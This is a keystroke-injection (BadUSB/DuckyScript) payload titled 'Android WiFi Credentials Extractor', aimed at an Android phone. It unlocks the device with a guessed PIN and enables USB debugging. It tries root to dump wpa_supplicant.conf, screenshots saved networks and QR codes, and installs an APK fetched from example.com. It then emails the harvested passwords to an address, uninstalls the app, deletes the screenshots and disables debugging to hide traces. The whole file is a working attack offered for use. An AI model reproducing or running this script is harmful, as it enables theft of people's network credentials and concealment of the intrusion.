REM Android WiFi Credentials Extractor
REM Author: AryanVBW
REM Version: 1.0
REM Extracts saved WiFi passwords from Android devices

REM ---- INITIAL SETUP ----
DELAY 1500

REM Wake up the device
ENTER
DELAY 500
ENTER
DELAY 1000

REM Swipe up to unlock (universal method)
SWIPE 500 1800 500 800
DELAY 1500

REM ---- STEP 1: ENABLE DEVELOPER OPTIONS ----

REM Open Settings
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING settings
DELAY 800
ENTER
DELAY 2000

REM Navigate to About phone
STRING about
DELAY 800
ENTER
DELAY 1500

REM Find Build Number
STRING build
DELAY 800
ENTER
DELAY 1500

REM Tap on Build Number 7 times
REPEAT 7 {
    ENTER
    DELAY 300
}
DELAY 1500

REM Enter PIN/pattern if prompted
STRING 1234
DELAY 800
ENTER
DELAY 1500

REM ---- STEP 2: ENABLE USB DEBUGGING ----

REM Go back to main Settings
BACK
DELAY 800

REM Open Developer Options
STRING developer
DELAY 800
ENTER
DELAY 1500

REM Enable USB debugging
STRING usb debugging
DELAY 800
TAB
DELAY 300
ENTER
DELAY 1000

REM Confirm USB debugging
STRING allow
DELAY 800
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 1500

REM ---- STEP 3: EXTRACT WIFI CREDENTIALS METHOD 1 (ROOT REQUIRED) ----

REM Install Terminal app if not present
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING play store
DELAY 800
ENTER
DELAY 3000

REM Search for Terminal Emulator
TAB
DELAY 500
ENTER
DELAY 1000
STRING terminal emulator
DELAY 1000
ENTER
DELAY 2000

REM Install the app
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 5000

REM Open Terminal Emulator
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING terminal
DELAY 800
ENTER
DELAY 2000

REM Try to get root access
STRING su
DELAY 800
ENTER
DELAY 2000

REM If root access granted, extract WiFi passwords
STRING cat /data/misc/wifi/wpa_supplicant.conf > /sdcard/wifipasswords.txt
DELAY 1000
ENTER
DELAY 2000

REM ---- STEP 4: EXTRACT WIFI CREDENTIALS METHOD 2 (NO ROOT) ----

REM Open Settings
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING settings
DELAY 800
ENTER
DELAY 2000

REM Navigate to Network & Internet
STRING network
DELAY 800
ENTER
DELAY 1500

REM Go to WiFi settings
STRING wifi
DELAY 800
ENTER
DELAY 1500

REM Open saved networks
STRING saved
DELAY 800
ENTER
DELAY 1500

REM Take screenshots of each saved network
REPEAT 5 {
    ENTER
    DELAY 1000
    
    REM Take screenshot (universal method)
    VOLUMEDOWN POWER
    DELAY 1000
    
    REM Go back to saved networks list
    BACK
    DELAY 800
    
    REM Move to next network
    DOWNARROW
    DELAY 500
}

REM ---- STEP 5: EXTRACT WIFI CREDENTIALS METHOD 3 (QR CODE) ----

REM Go back to WiFi settings
BACK
DELAY 800

REM Select current connected network
ENTER
DELAY 1500

REM Look for Share or QR code option
STRING share
DELAY 800
ENTER
DELAY 1500

REM Take screenshot of QR code
VOLUMEDOWN POWER
DELAY 1000

REM ---- STEP 6: INSTALL WIFI PASSWORD RECOVERY APP ----

REM Go to Chrome
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING chrome
DELAY 800
ENTER
DELAY 3000

REM Access address bar
TAB
DELAY 500
ENTER
DELAY 1000

REM Enter URL for WiFi password recovery app
STRING https://example.com/wifi-recovery.apk
DELAY 1000
ENTER
DELAY 5000

REM Wait for download to complete
DELAY 10000

REM Open notification shade
SWIPE 500 100 500 1700
DELAY 1500

REM Tap on download notification
ENTER
DELAY 3000

REM Install the app
STRING install
DELAY 800
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 5000

REM ---- STEP 7: RUN WIFI PASSWORD RECOVERY APP ----

REM Open the WiFi recovery app
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING wifi
DELAY 800
ENTER
DELAY 2000

REM Grant necessary permissions
STRING allow
DELAY 800
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 1500

REM Scan for WiFi networks
STRING scan
DELAY 800
ENTER
DELAY 3000

REM Export passwords
STRING export
DELAY 800
ENTER
DELAY 1500

REM Save to external storage
STRING external
DELAY 800
ENTER
DELAY 2000

REM ---- STEP 8: EXFILTRATE THE EXTRACTED DATA ----

REM Share the exported file
STRING share
DELAY 800
ENTER
DELAY 1500

REM Share via email
STRING email
DELAY 800
ENTER
DELAY 2000

REM Enter email address
STRING example@example.com
DELAY 800
TAB
DELAY 300
STRING WiFi Passwords
DELAY 800
TAB
DELAY 300
STRING Extracted WiFi passwords
DELAY 800
ENTER
DELAY 3000

REM ---- STEP 9: CLEAN UP TRACES ----

REM Uninstall the WiFi recovery app
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING settings
DELAY 800
ENTER
DELAY 2000

REM Navigate to Apps
STRING apps
DELAY 800
ENTER
DELAY 1500

REM Find the WiFi recovery app
STRING wifi
DELAY 800
ENTER
DELAY 1500

REM Uninstall the app
STRING uninstall
DELAY 800
ENTER
DELAY 1000
STRING confirm
DELAY 800
ENTER
DELAY 2000

REM Delete screenshots
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING gallery
DELAY 800
ENTER
DELAY 2000

REM Select screenshots
TAB
DELAY 300
TAB
DELAY 300
ENTER
DELAY 1000
STRING select all
DELAY 800
ENTER
DELAY 1500

REM Delete selected items
STRING delete
DELAY 800
ENTER
DELAY 1000
STRING confirm
DELAY 800
ENTER
DELAY 1500

REM ---- STEP 10: DISABLE USB DEBUGGING ----

REM Go to Developer Options
HOME
DELAY 800
SWIPE 500 1700 500 700
DELAY 1000
STRING settings
DELAY 800
ENTER
DELAY 2000
STRING developer
DELAY 800
ENTER
DELAY 1500

REM Disable USB debugging
STRING usb debugging
DELAY 800
TAB
DELAY 300
ENTER
DELAY 1000

REM ---- FINISHED ----
REM WiFi credentials have been extracted and exfiltrated

REM Return to home screen
HOME
DELAY 800
